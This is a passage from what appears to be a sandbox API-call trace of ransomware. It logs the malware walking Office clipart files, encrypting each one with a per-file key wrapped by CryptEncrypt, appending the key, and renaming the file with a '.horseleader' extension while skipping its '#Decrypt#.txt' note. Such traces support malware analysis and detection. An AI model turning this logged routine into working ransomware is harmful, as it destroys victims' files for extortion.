office\\clipart\\pub60cor\\dd00687_.wmf.horseleader")) returned 1 [0253.981] GetProcessHeap () returned 0x780000 [0253.981] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.981] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bcb1e00, ftCreationTime.dwHighDateTime=0x1bd4b37, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6bcb1e00, ftLastWriteTime.dwHighDateTime=0x1bd4b37, nFileSizeHigh=0x0, nFileSizeLow=0x600c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00705_.WMF", cAlternateFileName="")) returned 1 [0253.981] lstrcmpiW (lpString1="DD00705_.WMF", lpString2="Windows") returned -1 [0253.981] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 67 [0253.981] StrStrIW (lpFirst="DD00705_.WMF", lpSrch=".horseleader") returned 0x0 [0253.981] lstrcmpW (lpString1="DD00705_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.981] lstrcmpW (lpString1="DD00705_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.981] lstrlenW (lpString=".testttjffg") returned 11 [0253.981] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.981] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.981] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.982] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 67 [0253.982] StrStrW (lpFirst="DD00705_.WMF", lpSrch=".txt") returned 0x0 [0253.983] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=24588) returned 1 [0253.983] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.986] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.986] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.986] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x100c, lpOverlapped=0x0) returned 1 [0253.987] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeff4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.987] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x100c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x100c, lpOverlapped=0x0) returned 1 [0253.987] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.987] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.987] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.987] CloseHandle (hObject=0x158) returned 1 [0253.987] GetProcessHeap () returned 0x780000 [0253.988] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.988] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.horseleader") returned 79 [0253.988] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf.horseleader")) returned 1 [0253.989] GetProcessHeap () returned 0x780000 [0253.989] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.989] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb92d600, ftCreationTime.dwHighDateTime=0x1bd4b42, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdb92d600, ftLastWriteTime.dwHighDateTime=0x1bd4b42, nFileSizeHigh=0x0, nFileSizeLow=0x8b2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01015_.WMF", cAlternateFileName="")) returned 1 [0253.989] lstrcmpiW (lpString1="DD01015_.WMF", lpString2="Windows") returned -1 [0253.989] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 67 [0253.989] StrStrIW (lpFirst="DD01015_.WMF", lpSrch=".horseleader") returned 0x0 [0253.989] lstrcmpW (lpString1="DD01015_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.989] lstrcmpW (lpString1="DD01015_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.989] lstrlenW (lpString=".testttjffg") returned 11 [0253.989] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.989] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.990] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.991] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 67 [0253.991] StrStrW (lpFirst="DD01015_.WMF", lpSrch=".txt") returned 0x0 [0253.991] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2226) returned 1 [0253.991] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8b2, lpOverlapped=0x0) returned 1 [0253.993] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff74e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.993] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8b2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8b2, lpOverlapped=0x0) returned 1 [0253.993] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.993] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.993] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.993] CloseHandle (hObject=0x158) returned 1 [0253.994] GetProcessHeap () returned 0x780000 [0253.994] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.994] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.horseleader") returned 79 [0253.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf.horseleader")) returned 1 [0253.995] GetProcessHeap () returned 0x780000 [0253.995] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.995] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x39e4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01039_.WMF", cAlternateFileName="")) returned 1 [0253.995] lstrcmpiW (lpString1="DD01039_.WMF", lpString2="Windows") returned -1 [0253.995] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 67 [0253.995] StrStrIW (lpFirst="DD01039_.WMF", lpSrch=".horseleader") returned 0x0 [0253.995] lstrcmpW (lpString1="DD01039_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.995] lstrcmpW (lpString1="DD01039_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.995] lstrlenW (lpString=".testttjffg") returned 11 [0253.995] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.995] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.995] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.997] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 67 [0253.997] StrStrW (lpFirst="DD01039_.WMF", lpSrch=".txt") returned 0x0 [0253.997] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14820) returned 1 [0253.997] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x39e4, lpOverlapped=0x0) returned 1 [0254.000] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc61c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.001] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x39e4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x39e4, lpOverlapped=0x0) returned 1 [0254.001] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.001] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.001] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.001] CloseHandle (hObject=0x158) returned 1 [0254.001] GetProcessHeap () returned 0x780000 [0254.001] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.001] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.horseleader") returned 79 [0254.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf.horseleader")) returned 1 [0254.002] GetProcessHeap () returned 0x780000 [0254.002] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.002] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe6c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01138_.WMF", cAlternateFileName="")) returned 1 [0254.003] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="Windows") returned -1 [0254.003] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 67 [0254.003] StrStrIW (lpFirst="DD01138_.WMF", lpSrch=".horseleader") returned 0x0 [0254.003] lstrcmpW (lpString1="DD01138_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.003] lstrcmpW (lpString1="DD01138_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.003] lstrlenW (lpString=".testttjffg") returned 11 [0254.004] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.004] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.004] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.004] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.005] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 67 [0254.005] StrStrW (lpFirst="DD01138_.WMF", lpSrch=".txt") returned 0x0 [0254.005] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3692) returned 1 [0254.005] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xe6c, lpOverlapped=0x0) returned 1 [0254.007] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff194, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.007] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xe6c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xe6c, lpOverlapped=0x0) returned 1 [0254.007] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.007] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.008] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.008] CloseHandle (hObject=0x158) returned 1 [0254.008] GetProcessHeap () returned 0x780000 [0254.008] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.008] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.horseleader") returned 79 [0254.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf.horseleader")) returned 1 [0254.009] GetProcessHeap () returned 0x780000 [0254.009] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.009] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe30, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01139_.WMF", cAlternateFileName="")) returned 1 [0254.009] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="Windows") returned -1 [0254.009] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 67 [0254.009] StrStrIW (lpFirst="DD01139_.WMF", lpSrch=".horseleader") returned 0x0 [0254.009] lstrcmpW (lpString1="DD01139_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.009] lstrcmpW (lpString1="DD01139_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.009] lstrlenW (lpString=".testttjffg") returned 11 [0254.009] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.009] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.009] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.010] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.019] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 67 [0254.019] StrStrW (lpFirst="DD01139_.WMF", lpSrch=".txt") returned 0x0 [0254.019] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3632) returned 1 [0254.019] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xe30, lpOverlapped=0x0) returned 1 [0254.023] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff1d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.023] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xe30, lpOverlapped=0x0) returned 1 [0254.023] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.088] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.089] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.089] CloseHandle (hObject=0x158) returned 1 [0254.089] GetProcessHeap () returned 0x780000 [0254.089] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.089] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.horseleader") returned 79 [0254.089] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf.horseleader")) returned 1 [0254.090] GetProcessHeap () returned 0x780000 [0254.090] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.090] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01140_.WMF", cAlternateFileName="")) returned 1 [0254.090] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="Windows") returned -1 [0254.090] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 67 [0254.091] StrStrIW (lpFirst="DD01140_.WMF", lpSrch=".horseleader") returned 0x0 [0254.091] lstrcmpW (lpString1="DD01140_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.091] lstrcmpW (lpString1="DD01140_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.091] lstrlenW (lpString=".testttjffg") returned 11 [0254.091] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.091] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.091] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.091] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program 